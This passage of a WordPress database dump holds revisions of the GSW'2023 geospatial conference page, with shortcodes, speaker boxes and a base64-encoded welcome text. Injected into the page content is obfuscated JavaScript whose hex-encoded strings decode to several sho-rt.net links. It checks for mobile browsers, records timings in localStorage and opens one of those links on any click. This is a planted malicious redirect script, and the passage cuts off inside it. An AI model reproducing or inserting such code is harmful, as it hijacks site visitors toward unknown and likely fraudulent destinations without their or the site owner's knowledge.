_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','WORKSHOPS','','inherit','closed','closed','','2372-revision-v1','','','2022-10-07 02:01:51','2022-10-07 02:01:51','',2372,'https://gsw2023.com/?p=2378',0,'revision','',0),
(2379,1,'2022-10-07 12:40:22','2022-10-07 12:40:22','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%20https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665135361340{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 BY\" main_heading_color=\"#f27304\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"https://www.isprs.org/\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 